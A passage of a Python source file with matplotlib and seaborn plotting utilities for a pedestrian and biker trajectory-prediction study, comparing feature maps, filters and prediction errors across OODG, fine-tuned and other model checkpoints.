    Saves the figure to `<out_dir>/result.png`.
    """
    update_modes = sorted(os.listdir(results_dir))
    ades = {}  # {update_mode: {num_batches: [ade, one per seed]}}
    for update_mode in update_modes:
        update_mode_dir = os.path.join(results_dir, update_mode)
        seeds = os.listdir(update_mode_dir)
        ades[update_mode] = {}
        for seed in seeds:
            seed_dir = os.path.join(update_mode_dir, seed)
            num_files = os.listdir(seed_dir)
            for num_file in num_files:
                # File stem encodes the number of batches, e.g. '4.csv' -> 4.
                num = int(num_file.split('.csv')[0])
                num_path = os.path.join(seed_dir, num_file)
                # float(pd.read_csv(num_path).columns[0])
                ade = float(pd.read_csv(num_path).values[0][0])
                if num not in ades[update_mode]:
                    ades[update_mode][num] = []
                ades[update_mode][num].append(ade)
        # Optionally add a zero-shot (0 batches) baseline from the "None" sibling dir.
        # NOTE(review): `seed` leaks from the loop above, so only the last seed's
        # zero-shot file is read, and this raises NameError if `seeds` is empty --
        # confirm this is intended.
        zero_shot_path = results_dir.split("/")
        zero_shot_path[-2] = "None"
        zero_shot_path += ['eval', seed, '0.csv']
        zero_shot_path = '/'.join(zero_shot_path)
        if os.path.isfile(zero_shot_path):
            # float(pd.read_csv(num_path).columns[0])
            ade = float(pd.read_csv(zero_shot_path).values[0][0])
            num = 0
            if num not in ades[update_mode]:
                ades[update_mode][num] = []
            ades[update_mode][num].append(ade)
    f, ax = plt.subplots(figsize=(6, 4))
    for train_name, train_vals in ades.items():
        # Flatten {num: [values]} into aligned x/y columns for seaborn.
        # NOTE(review): the x-column assumes every num has the same number of
        # values as the first one -- confirm for unbalanced seed results.
        v = [i for j in list(train_vals.values()) for i in j]
        k = [j for j in list(train_vals.keys())
             for _ in range(len(list(train_vals.values())[0]))]
        df = pd.DataFrame({'x': k, 'y': v})
        sns.lineplot(data=df, x='x', y='y',
                     label=labels[train_name], ax=ax, marker="o")
    sns.despine()
    pathlib.Path(out_dir).mkdir(parents=True, exist_ok=True)
    plt.ylabel('ADE', fontsize=fontsize)
    plt.xlabel('# Batches', fontsize=fontsize)
    plt.xticks(fontsize=fontsize)
    plt.yticks(fontsize=fontsize)
    plt.legend(fontsize=fontsize)
    # Batch counts are integers; avoid fractional x ticks.
    ax.xaxis.set_major_locator(matplotlib.ticker.MaxNLocator(integer=True))
    plt.savefig(f'{out_dir}/result.png', bbox_inches='tight', pad_inches=0)
def plot_input_space(semantic_images, observed_map, meta_ids, scene_id, out_dir='figures', format='png'):
    """Visualize model input: semantic map channels and observed trajectory maps.

    Args:
        semantic_images: (batch_size, n_class, height, width)
        observed_map: (batch_size, obs_len, height, width)
        meta_ids: per-sample identifiers used in the output file names
        scene_id: scene identifier used in the output file names
        out_dir: output directory, created if missing
        format: image file extension
    """
    pathlib.Path(out_dir).mkdir(parents=True, exist_ok=True)
    for i, meta_id in enumerate(meta_ids):
        observed_map_i = observed_map[i]
        semantic_image_i = semantic_images[i]
        # Create a fresh figure per sample. Previously one figure was created
        # before the loop and closed inside it, so every sample after the
        # first was drawn on (and saved from) a new empty figure.
        fig, axes = plt.subplots(2, observed_map.shape[1], figsize=(observed_map.shape[1]*4, 2*4))
        # plot semantic map
        for c in range(semantic_image_i.shape[0]):
            im = axes[0, c].imshow(semantic_image_i[c], vmin=0, vmax=1, interpolation='nearest')
            divider = make_axes_locatable(axes[0, c])
            cax = divider.append_axes('right', size='5%', pad=0.05)
            fig.colorbar(im, cax=cax, orientation='vertical')
        # Title once on the middle axis (was re-set inside the channel loop).
        axes[0, semantic_image_i.shape[0] // 2].set_title('Semantic map')
        # hide empty plots
        for c in range(semantic_image_i.shape[0], observed_map_i.shape[0]):
            axes[0, c].axis('off')
        # plot observed trajectory map
        for t in range(observed_map_i.shape[0]):
            axes[1, t].imshow(observed_map_i[t], vmin=0, vmax=1)
        axes[1, observed_map_i.shape[0] // 2].set_title('Observed trajectory map')
        # save this sample's figure and release it
        out_name = f'{meta_id}__{scene_id}'
        out_path = os.path.join(out_dir, out_name + '.' + format)
        fig.savefig(out_path, bbox_inches='tight')
        plt.close(fig)
        print(f'Saved {out_path}')
def plot_feature_space(dict_features, out_dir='figures/feature_space', show_diff=True, format='png'):
    """Plot per-sample feature maps, either as raw features or as OODG diffs.

    Args:
        dict_features (dict): Nested mapping
            {ckpt_name: {scene_id: {feature_name: np.ndarray of shape
            (n_samples, n_channel, height, width), ..., 'metaId': list}}}.
            All checkpoints are assumed to share scene ids, feature names and
            sample order.
        out_dir (str, optional): Output directory. Defaults to 'figures/feature_space'.
        show_diff (bool, optional): If True, plot the difference between the
            'OODG' checkpoint and the 'FT'/'ET' checkpoints; otherwise plot
            every checkpoint's raw features. Defaults to True.
        format (str, optional): Image file extension. Defaults to 'png'.
    """
    # TODO: show colorbar
    # TODO: add plot only first k figures
    first_dict = dict_features[list(dict_features)[0]]
    for scene_id, dict_scene in first_dict.items():
        for i, meta_id in enumerate(dict_scene['metaId']):
            features_name = list(dict_scene)
            features_name.remove('metaId')
            # for each sample, visualize feature space
            if show_diff:
                # show the difference between OODG and FT / ET
                for _, feature_name in enumerate(features_name):
                    n_channel = dict_scene[feature_name].shape[1]
                    diff_i = {}
                    for ckpt_name in ['FT', 'ET']:
                        if ('OODG' in dict_features.keys()) & (ckpt_name in dict_features.keys()):
                            diff_i[ckpt_name] = dict_features['OODG'][scene_id][feature_name][i] - \
                                dict_features[ckpt_name][scene_id][feature_name][i]
                    if not diff_i:
                        # Nothing to compare: needs 'OODG' plus 'FT' or 'ET'.
                        continue
                    # Downscale the per-panel figure size for large feature maps.
                    # Shapes are identical across checkpoints, so read them from
                    # the first checkpoint instead of a leaked loop variable.
                    height, width = dict_scene[feature_name][i][0].shape
                    while height >= 6:
                        height /= 2
                        width /= 2
                    fig, axes = plt.subplots(
                        len(diff_i), n_channel, figsize=(n_channel*width, len(diff_i)*height))
                    for k, ckpt_name in enumerate(diff_i):
                        for c in range(n_channel):
                            # With a single checkpoint row, axes is 1-D.
                            if len(axes.shape) == 1:
                                axes[c].imshow(diff_i[ckpt_name][c])
                                axes[c].set_xlabel(f'channel_{c+1}')
                                if c == 0: axes[c].set_ylabel(labels_ckpt[ckpt_name])
                            else:
                                axes[k, c].imshow(diff_i[ckpt_name][c])
                                axes[k, c].set_xlabel(f'channel_{c+1}')
                                if c == 0: axes[k, c].set_ylabel(labels_ckpt[ckpt_name])
                    title = f'meta_id={meta_id}, scene_id={scene_id}, feature_name={feature_name}'
                    if len(axes.shape) == 1:
                        axes[n_channel//2].set_title(title)
                    else:
                        axes[0, n_channel//2].set_title(title)
                    pathlib.Path(out_dir).mkdir(parents=True, exist_ok=True)
                    out_name = f'{meta_id}__{scene_id}__{feature_name}_diff'
                    out_path = os.path.join(out_dir, out_name + '.' + format)
                    plt.savefig(out_path, bbox_inches='tight')
                    plt.close(fig)
                    print(f'Saved {out_path}')
            else:
                # show the original feature space
                for _, feature_name in enumerate(features_name):
                    n_channel = dict_scene[feature_name].shape[1]
                    n_ckpt = len(dict_features)
                    # BUG FIX: the original read `dict_ckpt[scene_id][...]` here,
                    # but `dict_ckpt` is only bound inside the loop below, which
                    # raised NameError. Shapes match across checkpoints, so use
                    # the first checkpoint's data.
                    height, width = dict_scene[feature_name][i][0].shape
                    while height >= 6:
                        height /= 2
                        width /= 2
                    fig, axes = plt.subplots(n_ckpt, n_channel,
                                             figsize=(n_channel*width, n_ckpt*height))
                    for k, (ckpt_name, dict_ckpt) in enumerate(dict_features.items()):
                        feature_i = dict_ckpt[scene_id][feature_name][i]  # (n_channel, height, width)
                        for c in range(n_channel):
                            if len(axes.shape) == 1:
                                axes[c].imshow(feature_i[c])
                                axes[c].set_xlabel(f'channel_{c+1}')
                                if c == 0: axes[c].set_ylabel(labels_ckpt[ckpt_name])
                            else:
                                axes[k, c].imshow(feature_i[c])
                                axes[k, c].set_xlabel(f'channel_{c+1}')
                                if c == 0: axes[k, c].set_ylabel(labels_ckpt[ckpt_name])
                    title = f'meta_id={meta_id}, scene_id={scene_id}, feature_name={feature_name}'
                    if len(axes.shape) == 1:
                        axes[n_channel//2].set_title(title)
                    else:
                        axes[0, n_channel//2].set_title(title)
                    pathlib.Path(out_dir).mkdir(parents=True, exist_ok=True)
                    out_name = f'{meta_id}__{scene_id}__{feature_name}'
                    out_path = os.path.join(out_dir, out_name + '.' + format)
                    plt.savefig(out_path, bbox_inches='tight')
                    plt.close(fig)
                    print(f'Saved {out_path}')
def plot_feature_space_diff_evolution(
    dict_features, out_dir='figures/feature_space_diff',
    encoder_only=False, diff_type='absolute',
    by_scene=True, format='png'):
    """Plot the difference of OODG and FT/ET along with layers.

    Args:
        dict_features (dict):
            Dict storing all features, keyed by checkpoint name
            ('OODG', 'FT', 'ET'), then scene id, then layer/feature name;
            each leaf is an array shaped (n_samples, C, H, W).
        out_dir (str, optional):
            Path for figures. Defaults to 'figures/feature_space_diff'.
        encoder_only (bool, optional):
            Visualize only encoder or the whole network. Defaults to False.
        diff_type (str, optional):
            One of ['absolute', 'overall_relative', 'pixel_relative'].
            Defaults to 'absolute'.
        by_scene (bool, optional):
            Additionally emit one difference plot per scene. Defaults to True.
        format (str, optional):
            Image file format. Defaults to 'png'.

    Raises:
        ValueError: if diff_type is not one of the supported values.
    """
    diff_dict, df_dict, original_dict, ckpt_scene_dict = {}, {}, {}, {}
    df_original = pd.DataFrame()
    # Compare OODG against each tuned checkpoint that is present.
    for ckpt_name in ['FT', 'ET']:
        if ('OODG' in dict_features.keys()) and (ckpt_name in dict_features.keys()):
            name = f'diff_OODG_{ckpt_name}'
            diff_dict[name] = {}
            original_dict['OODG'] = {}
            original_dict[ckpt_name] = {}
            ckpt_scene_dict[ckpt_name] = {}
            for s, (scene_id, dict_scene) in enumerate(dict_features[list(dict_features)[0]].items()):
                features_name = list(dict_scene)
                features_name.remove('metaId')
                if encoder_only:
                    features_name = [f for f in features_name if 'Encoder' in f]
                if s == 0:
                    # Initialize the per-layer accumulators on the first scene.
                    for feature_name in features_name:
                        diff_dict[name][feature_name] = []
                        original_dict['OODG'][feature_name] = []
                        original_dict[ckpt_name][feature_name] = []
                index = dict_scene['metaId']
                ckpt_scene_df = pd.DataFrame(index=index)
                for feature_name in features_name:
                    # diff using all pixels and channels
                    n_tot = dict_features['OODG'][scene_id][feature_name][0].reshape(-1).shape[0]
                    original_oodg = dict_features['OODG'][scene_id][feature_name]
                    original_ckpt = dict_features[ckpt_name][scene_id][feature_name]
                    diff = original_oodg - original_ckpt
                    if diff_type == 'absolute':
                        # FIX: 'absolute' is the advertised default but used to
                        # fall through to the ValueError below. Per-sample mean
                        # difference over (C, H, W).
                        add = diff.mean(axis=(1, 2, 3))
                    elif diff_type == 'overall_relative':
                        add = diff.mean(axis=(1, 2, 3)) / original_oodg.mean(axis=(1, 2, 3))
                    elif diff_type == 'pixel_relative':
                        # Per-pixel relative difference; zero OODG pixels are
                        # excluded via NaN so they do not blow up the mean.
                        add = np.empty(diff.shape)
                        add.fill(np.nan)
                        np.divide(diff, original_oodg, out=add, where=original_oodg != 0)
                        add = np.nanmean(add, axis=(1, 2, 3))
                    else:
                        raise ValueError(f'No support for diff_type={diff_type}')
                    diff_dict[name][feature_name].extend(add)
                    ckpt_scene_df.loc[index, feature_name] = add
                    original_dict['OODG'][feature_name].extend(original_oodg.sum(axis=(1, 2, 3)) / n_tot)
                    original_dict[ckpt_name][feature_name].extend(original_ckpt.sum(axis=(1, 2, 3)) / n_tot)
                ckpt_scene_dict[ckpt_name][scene_id] = ckpt_scene_df
            # average over samples
            df = pd.DataFrame()
            n_data = len(diff_dict[name][features_name[0]])
            for feature_name in features_name:
                df.loc[feature_name, name] = np.mean(diff_dict[name][feature_name])
                df.loc[feature_name, name + '_std'] = np.std(diff_dict[name][feature_name])
                df_original.loc[feature_name, 'OODG'] = np.mean(original_dict['OODG'][feature_name])
                df_original.loc[feature_name, 'OODG_std'] = np.std(original_dict['OODG'][feature_name])
                df_original.loc[feature_name, ckpt_name] = np.mean(original_dict[ckpt_name][feature_name])
                df_original.loc[feature_name, ckpt_name + '_std'] = np.std(original_dict[ckpt_name][feature_name])
            df_dict[name] = df
    # plot configuration
    if df.shape[0] == 3:
        fig_size, depth = 4, 0
    elif df.shape[0] == 20:  # 6+7+7
        fig_size, depth = 10, 1
    elif df.shape[0] == 83:  # 23+30+30
        fig_size, depth = 20, 2
    else:
        # when encoder_only=True, depth will be unknown
        fig_size, depth = df.shape[0] * 0.25 + 4, df.shape[0]
    # ## feature space difference plot along with layers
    fig, ax = plt.subplots(figsize=(fig_size, 4))
    plt.axhline(y=0, color='gray', linestyle='-', linewidth=0.5, alpha=0.3)
    for name in df_dict.keys():
        df = df_dict[name]
        for b, block in enumerate(['Encoder', 'GoalDecoder', 'TrajDecoder']):
            df_block = df[df.index.str.contains(block)]
            if df_block.shape[0]:
                # Label only the first block so the legend has one entry per diff.
                if b == 0:
                    plt.plot(df_block.index, df_block[name].values, '.-', c=colors[name], label=name)
                else:
                    plt.plot(df_block.index, df_block[name].values, '.-', c=colors[name])
                plt.fill_between(df_block.index, df_block[name].values - df_block[name + '_std'].values,
                    df_block[name].values + df_block[name + '_std'].values, color=colors[name], alpha=0.2)
    plt.title('Feature space difference')
    plt.ylabel(f'{diff_type} difference')
    plt.xlabel('Layers')
    plt.legend(loc='best')
    if (depth == 0) or (depth == 1) or encoder_only:
        plt.xticks(rotation=45, ha='right')
    else:  # (depth == 2) | (depth == unknown)
        plt.xticks(rotation=90, ha='right')
    pathlib.Path(out_dir).mkdir(parents=True, exist_ok=True)
    out_name = f'{"_".join(df_dict.keys())}__D{depth}__N{n_data}__{diff_type}'
    if encoder_only: out_name += '__encoder'
    out_path = os.path.join(out_dir, f'{out_name}.{format}')
    plt.savefig(out_path, bbox_inches='tight')
    plt.close(fig)
    print(f'Saved {out_path}')
    # ## plot the original values in feature space
    fig, ax = plt.subplots(figsize=(fig_size, 4))
    for ckpt_name in original_dict.keys():
        for b, block in enumerate(['Encoder', 'GoalDecoder', 'TrajDecoder']):
            df_block = df_original[df_original.index.str.contains(block)]
            if df_block.shape[0]:
                if b == 0:
                    plt.plot(df_block.index, df_block[ckpt_name].values, '.-', c=colors[ckpt_name], label=ckpt_name)
                else:
                    plt.plot(df_block.index, df_block[ckpt_name].values, '.-', c=colors[ckpt_name])
                plt.fill_between(df_block.index, df_block[ckpt_name].values - df_block[ckpt_name + '_std'].values,
                    df_block[ckpt_name].values + df_block[ckpt_name + '_std'].values, color=colors[ckpt_name], alpha=0.2)
    plt.title('Feature space')
    plt.ylabel('Value')
    plt.xlabel('Layers')
    plt.legend(loc='best')
    if (depth == 0) or (depth == 1) or encoder_only:
        plt.xticks(rotation=45, ha='right')
    else:  # (depth == 2) | (depth == unknown)
        plt.xticks(rotation=90, ha='right')
    pathlib.Path(out_dir).mkdir(parents=True, exist_ok=True)
    out_name = f'{"_".join(original_dict.keys())}__D{depth}__N{n_data}'
    if encoder_only: out_name = f'{out_name}__encoder'
    out_path = os.path.join(out_dir, f'{out_name}.{format}')
    plt.savefig(out_path, bbox_inches='tight')
    plt.close(fig)
    print(f'Saved {out_path}')
    # ## plot by_scene
    if by_scene:
        for ckpt_name, scene_dict in ckpt_scene_dict.items():
            for scene_id in scene_dict.keys():
                fig, ax = plt.subplots(figsize=(fig_size, 4))
                plt.axhline(y=0, color='gray', linestyle='-', linewidth=0.5, alpha=0.3)
                df = scene_dict[scene_id]
                for i, meta_id in enumerate(df.index):
                    for b, block in enumerate(['Encoder', 'GoalDecoder', 'TrajDecoder']):
                        # plot each example
                        cols = df.columns[df.columns.str.contains(block)]
                        example = df.loc[meta_id, cols].to_numpy()
                        if example.shape[0]:
                            plt.plot(cols, example, c=colors[ckpt_name], linewidth=0.5, alpha=0.3)
                            # plot average
                            mean = df.loc[:, cols].mean(axis=0).to_numpy()
                            if (i == 0) and (b == 0):
                                plt.plot(cols, mean, '.-', c=colors[ckpt_name], label=f'diff_OODG_{ckpt_name}')
                            else:
                                plt.plot(cols, mean, '.-', c=colors[ckpt_name])
                plt.title(f'Feature space difference ({scene_id})')
                plt.ylabel(f'{diff_type} difference')
                plt.xlabel('Layers')
                plt.legend(loc='best')
                if (depth == 0) or (depth == 1) or encoder_only:
                    plt.xticks(rotation=45, ha='right')
                else:  # (depth == 2) | (depth == unknown)
                    plt.xticks(rotation=90, ha='right')
                pathlib.Path(out_dir).mkdir(parents=True, exist_ok=True)
                out_name = f'diff_OODG_{ckpt_name}__{scene_id}__D{depth}__N{n_data}__{diff_type}'
                if encoder_only: out_name = f'{out_name}__encoder'
                out_path = os.path.join(out_dir, f'{out_name}.{format}')
                plt.savefig(out_path, bbox_inches='tight')
                plt.close(fig)
                print(f'Saved {out_path}')
def plot_trajectories_scenes_overlay(image_path, df_biker, df_ped, out_dir='figures/scene_with_trajs', format='png'):
    """Overlay biker and pedestrian trajectories on each shared scene image.

    Args:
        image_path: Root directory with one sub-folder per scene containing a
            'reference.jpg' (loaded via create_images_dict).
        df_biker: Biker trajectory dataframe with columns sceneId, metaId, x, y.
        df_ped: Pedestrian trajectory dataframe with the same columns.
        out_dir (str, optional): Output directory. Defaults to 'figures/scene_with_trajs'.
        format (str, optional): Image file format. Defaults to 'png'.
    """
    # Only scenes that contain BOTH biker and pedestrian trajectories.
    unique_scene = list(set(df_biker.sceneId.unique()).intersection(set(df_ped.sceneId.unique())))
    scene_images = create_images_dict(unique_scene, image_path, 'reference.jpg', True)
    for scene_id in unique_scene:
        print(f'Plotting {scene_id}')
        scene_biker = df_biker[df_biker.sceneId == scene_id]
        scene_ped = df_ped[df_ped.sceneId == scene_id]
        height, width = scene_images[scene_id].shape[0], scene_images[scene_id].shape[1]
        # NOTE(review): figsize is (height/50, width/50) but matplotlib expects
        # (width, height) — confirm the swap is intentional.
        fig = plt.figure(figsize=(height/50, width/50))
        plt.imshow(scene_images[scene_id])
        ms = 2  # marker size
        # One scatter+polyline per biker trajectory (grouped by metaId).
        for _, traj in scene_biker.groupby('metaId'):
            plt.scatter(traj.x, traj.y, s=ms, c='r', alpha=0.4)
            plt.plot(traj.x, traj.y, 'r-', ms=ms, alpha=0.2)
        # Dummy plot at the origin to get a single legend entry per class.
        plt.plot(0,0,'r-', alpha=0.5, label='Biker')
        for _, traj in scene_ped.groupby('metaId'):
            plt.scatter(traj.x, traj.y, s=ms, c='b', alpha=0.4)
            plt.plot(traj.x, traj.y, 'b-', alpha=0.2)
        plt.plot(0,0,'b-', alpha=0.5, label='Pedestrian')
        # White dummy point masks the two legend dummies at the origin.
        plt.plot(0,0,'w')
        plt.title(f'scene: {scene_id}')
        plt.legend(loc='best')
        pathlib.Path(out_dir).mkdir(parents=True, exist_ok=True)
        out_path = os.path.join(out_dir, scene_id + '.' + format)
        plt.savefig(out_path, bbox_inches='tight')
        plt.close(fig)
        print(f'Saved {out_path}')
def plot_obs_pred_trajs(image_path, dict_trajs, out_dir='figures/prediction', format='png', obs_len=8):
    """Plot observed, ground-truth and predicted trajectories for each sample.

    Args:
        image_path: Root directory holding per-scene 'reference.jpg' images.
        dict_trajs (dict): Mapping from checkpoint name to a dict with keys
            'metaId', 'sceneId', 'groundtruth', 'prediction'; all checkpoints
            are assumed to share the same sample order.
        out_dir (str, optional): Output directory. Defaults to 'figures/prediction'.
        format (str, optional): Image file format. Defaults to 'png'.
        obs_len (int, optional): Number of observed time steps at the start of
            each ground-truth trajectory. Defaults to 8.
    """
    # Sample ids and scene ids are taken from the first checkpoint's dict.
    first_dict = dict_trajs[list(dict_trajs)[0]]
    scene_images = create_images_dict(first_dict['sceneId'], image_path, 'reference.jpg', True)
    colors = {'OB': 'black', 'GT': 'green', 'INDG': 'cyan', 'OODG': 'blue', 'FT': 'orange', 'ET': 'red'}
    for i, meta_id in enumerate(first_dict['metaId']):
        scene_id = first_dict['sceneId'][i]
        scene_image = scene_images[scene_id]
        fig = plt.figure(figsize=(scene_image.shape[0]/100, scene_image.shape[1]/100))
        plt.imshow(scene_image)
        ms = 3  # marker size
        for j, (ckpt_name, value) in enumerate(dict_trajs.items()):
            gt_traj = value['groundtruth'][i]
            pred_traj = value['prediction'][i]
            if j == 0:
                # Observed segment and ground-truth future are identical
                # across checkpoints, so draw them only once.
                plt.plot(gt_traj[:obs_len,0], gt_traj[:obs_len,1],
                    '.-', ms=ms, c=colors['OB'], label='observed')
                plt.plot(gt_traj[(obs_len-1):,0], gt_traj[(obs_len-1):,1],
                    '.-', ms=ms, c=colors['GT'], label=labels_ckpt['GT'])
            # Connector from last observed point to the first predicted point.
            plt.plot([gt_traj[obs_len-1,0], pred_traj[0,0]], [gt_traj[obs_len-1,1], pred_traj[0,1]],
                '.-', ms=ms, c=colors[ckpt_name])
            plt.plot(pred_traj[:,0], pred_traj[:,1],
                '.-', ms=ms, c=colors[ckpt_name], label=labels_ckpt[ckpt_name])
        title = f'meta_id={meta_id}, scene_id={scene_id}'
        plt.title(title)
        plt.legend(loc='best')
        pathlib.Path(out_dir).mkdir(parents=True, exist_ok=True)
        out_name = f'{meta_id}__{scene_id}'
        out_path = os.path.join(out_dir, out_name + '.'+ format)
        plt.savefig(out_path, bbox_inches='tight')
        plt.close(fig)
        print(f'Saved {out_path}')
def plot_decoder_overlay(image_path, dict_features, out_dir='figures/decoder', format='png', resize_factor=0.25):
    """Overlay goal/trajectory decoder feature maps on the scene image.

    Args:
        image_path: Root directory holding per-scene 'reference.jpg' images.
        dict_features (dict): Checkpoint name -> scene id -> feature name ->
            array shaped (n_samples, n_channel, H, W); also holds 'metaId'.
        out_dir (str, optional): Output directory. Defaults to 'figures/decoder'.
        format (str, optional): Image file format. Defaults to 'png'.
        resize_factor (float, optional): Down-scaling applied to the scene
            image before overlaying. Defaults to 0.25.
    """
    # take decoder name (layer naming differs between checkpoint exports)
    first_ckpt_dict = dict_features[list(dict_features)[0]]
    if 'GoalDecoder' in first_ckpt_dict[list(first_ckpt_dict)[0]]:
        goal_dec_name, traj_dec_name = 'GoalDecoder', 'TrajDecoder'
    elif 'GoalDecoder_B7' in first_ckpt_dict[list(first_ckpt_dict)[0]]:
        goal_dec_name, traj_dec_name = 'GoalDecoder_B7', 'TrajDecoder_B7'
    else:  # 'GoalDecoder_B7_L1' in first_ckpt_dict[list(first_ckpt_dict)[0]]
        goal_dec_name, traj_dec_name = 'GoalDecoder_B7_L1', 'TrajDecoder_B7_L1'
    # take unique scene images
    scene_images = create_images_dict(
        first_ckpt_dict.keys(), image_path, 'reference.jpg', True)
    for scene_id, dict_scene in first_ckpt_dict.items():
        for i, meta_id in enumerate(dict_scene['metaId']):
            scene_image = scene_images[scene_id]
            scene_image = cv2.resize(
                scene_image, (0, 0), fx=resize_factor, fy=resize_factor, interpolation=cv2.INTER_AREA)
            height, width = scene_image.shape[0], scene_image.shape[1]
            # for each sample, visualize overlayed feature space
            for _, feature_name in enumerate([goal_dec_name, traj_dec_name]):
                n_channel = dict_scene[feature_name].shape[1]
                n_ckpt = len(dict_features)
                # NOTE(review): axes[k, c] assumes a 2-D axes grid; with a
                # single checkpoint or single channel plt.subplots returns a
                # 1-D array and this would raise — confirm callers always
                # pass >= 2 checkpoints and channels.
                fig, axes = plt.subplots(
                    n_ckpt, n_channel, figsize=(n_channel*width/100, n_ckpt*height/100))
                for k, (ckpt_name, dict_ckpt) in enumerate(dict_features.items()):
                    feature_i = dict_ckpt[scene_id][feature_name][i]  # (n_channel, height, width)
                    for c in range(n_channel):
                        # Scene image underneath, semi-transparent heatmap on top.
                        axes[k, c].imshow(scene_image)
                        axes[k, c].imshow(feature_i[c], alpha=0.7, cmap='coolwarm')
                        if c == 0:
                            axes[k, c].set_ylabel(labels_ckpt[ckpt_name])
                        else:
                            axes[k, c].set_yticklabels([])
                        if k != (n_ckpt - 1):
                            axes[k, c].set_xticklabels([])
                        else:
                            axes[k, c].set_xlabel(f'channel_{c+1}')
                plt.subplots_adjust(wspace=0, hspace=0)
                plt.tight_layout()
                title = f'meta_id={meta_id}, scene_id={scene_id}, feature_name={feature_name}'
                axes[0, n_channel//2].set_title(title)
                pathlib.Path(out_dir).mkdir(parents=True, exist_ok=True)
                out_name = f'{meta_id}__{scene_id}__{feature_name}__overlay'
                out_path = os.path.join(out_dir, out_name + '.' + format)
                plt.savefig(out_path, bbox_inches='tight')
                plt.close(fig)
                print(f'Saved {out_path}')
def plot_filters(model_dict, out_dir='figures/filters', format='png'):
    """Visualize convolutional weight tensors of each model as image grids.

    Args:
        model_dict (dict): Model name -> wrapper exposing `.model.named_parameters()`.
        out_dir (str, optional): Output directory. Defaults to 'figures/filters'.
        format (str, optional): Image file format. Defaults to 'png'.
    """
    for model_name, model in model_dict.items():
        for param_name, param in model.model.named_parameters():
            # Only the main blocks; skip e.g. the segmentation head.
            if param_name.startswith(('encoder', 'goal_decoder', 'traj_decoder')):
                # Only 4-D conv weights (out, in, kh, kw); biases are skipped.
                if param_name.endswith('weight'):
                    c_out, c_in, height, width = param.shape
                    # Shared color scale across all filters of this layer.
                    vmin, vmax = param.min().item(), param.max().item()
                    fig, axes = plt.subplots(c_in, c_out, figsize=(c_out*width, c_in*height))
                    for o in range(c_out):
                        for i in range(c_in):
                            im = axes[i, o].imshow(param[o, i].cpu().detach().numpy(), vmin=vmin, vmax=vmax)
                            axes[i, o].set_xticklabels([])
                            axes[i, o].set_yticklabels([])
                    # One shared colorbar attached to the top-right subplot.
                    divider = make_axes_locatable(axes[0, c_out-1])
                    cax = divider.append_axes('right', size='5%', pad=0.05)
                    fig.colorbar(im, cax=cax, orientation='vertical')
                    plt.subplots_adjust(wspace=0, hspace=0)
                    plt.tight_layout()
                    axes[0, c_out//2-1].set_title('Out channels')
                    axes[c_in//2-1, 0].set_ylabel('In channels')
                    pathlib.Path(out_dir).mkdir(parents=True, exist_ok=True)
                    out_name = f'{model_name}__{param_name}'
                    out_path = os.path.join(out_dir, out_name + '.' + format)
                    plt.savefig(out_path, bbox_inches='tight')
                    plt.close(fig)
                    print(f'Saved {out_path}')
def plot_filters_diff_evolution(
    model_dict, out_dir='figures/filters_diff', format='png'):
    """Plot per-layer filter statistics and OODG-vs-tuned filter differences.

    Produces line plots and bar plots of (a) raw weight/bias sums and means
    per layer and (b) three difference measures between the OODG checkpoint
    and each tuned checkpoint (FT/ET).

    Args:
        model_dict (dict): Checkpoint name ('OODG', 'FT', 'ET') -> wrapper
            exposing `.model.named_parameters()`.
        out_dir (str, optional): Output directory. Defaults to 'figures/filters_diff'.
        format (str, optional): Image file format. Defaults to 'png'.

    Raises:
        ValueError: if no 'OODG' checkpoint is present to diff against.
    """
    if 'OODG' in model_dict.keys():
        df_filters = pd.DataFrame()
        # Collect per-parameter sums/means, plus diffs vs OODG for tuned models.
        for model_name, model in model_dict.items():
            if model_name == 'OODG':
                for param_name, param in model.model.named_parameters():
                    if not param_name.startswith('semantic_segmentation'):
                        df_filters.loc[param_name, model_name+'__sum'] = param.sum().item()
                        df_filters.loc[param_name, model_name+'__avg'] = param.mean().item()
            else:
                name = f'diff_OODG_{model_name}'
                # Relies on OODG and the tuned model sharing the exact same
                # parameter order (identical architectures).
                for (_, param_oodg), (param_name, param) in zip(
                    model_dict['OODG'].model.named_parameters(), model.model.named_parameters()):
                    if not param_name.startswith('semantic_segmentation'):
                        df_filters.loc[param_name, model_name+'__sum'] = param.sum().item()
                        df_filters.loc[param_name, model_name+'__avg'] = param.mean().item()
                        # overall relative: can be distorted by outliers
                        df_filters.loc[param_name, name+'__overall_relative'] = \
                            (param_oodg - param).sum().item() / param_oodg.sum().item()
                        # pixel_relative: can be smoothed by the mostly low values in filters; std is possible..(big)
                        df_filters.loc[param_name, name+'__pixel_relative'] = \
                            ((param_oodg - param) / param_oodg).mean().item()
                        # absolute
                        df_filters.loc[param_name, name+'__absolute'] = \
                            (param_oodg - param).sum().item()
        # Extend the module-level colors dict with weight/bias variants.
        colors.update({
            'OODG_weight': 'tab:blue', 'FT_weight': 'tab:orange', 'ET_weight': 'tab:red',
            'OODG_bias': 'lightsteelblue', 'FT_bias': 'navajowhite', 'ET_bias': 'pink',
            'diff_OODG_FT_weight': 'tab:orange', 'diff_OODG_FT_bias': 'navajowhite',
            'diff_OODG_ET_weight': 'tab:red', 'diff_OODG_ET_bias': 'pink'})
        fig_width = df_filters.shape[0]*0.25+3
        mask_w = df_filters.index.str.contains('weight')
        mask_b = df_filters.index.str.contains('bias')
        # NOTE(review): rstrip strips a character *set*, so layer names whose
        # stem ends in one of '.weight''s letters would be over-truncated —
        # verify against the actual parameter names.
        index = [n.rstrip('.weight') for n in df_filters.index[mask_w]]
        pathlib.Path(out_dir).mkdir(parents=True, exist_ok=True)
        # absolute values: plot
        for op in ['sum', 'avg']:
            fig, ax = plt.subplots(figsize=(fig_width, 4))
            for model_name in model_dict.keys():
                # solid line = weights, dashed line = biases
                plt.plot(index, df_filters.loc[mask_w, f'{model_name}__{op}'],
                    '-', c=colors[model_name], label=model_name+'_weight')
                plt.plot(index, df_filters.loc[mask_b, f'{model_name}__{op}'],
                    '--', c=colors[model_name], label=model_name+'_bias')
            plt.axhline(y=0, color='gray', linestyle='-', linewidth=0.5, alpha=0.3)
            plt.title('Filters')
            plt.ylabel('Value')
            plt.xlabel('Layers')
            plt.legend(loc='best')
            plt.xticks(rotation=45, ha='right')
            out_name = f'filters_{"_".join(model_dict.keys())}__{op}__plot.{format}'
            out_path = os.path.join(out_dir, out_name)
            plt.savefig(out_path, bbox_inches='tight')
            plt.close(fig)
            print(f'Saved {out_path}')
        # absolute values: bar plot
        df_dict = {}
        for op in ['sum', 'avg']:
            df = pd.DataFrame(index=index)
            for model_name in model_dict.keys():
                df.loc[index, model_name+'_weight'] = df_filters.loc[mask_w, f'{model_name}__{op}'].values
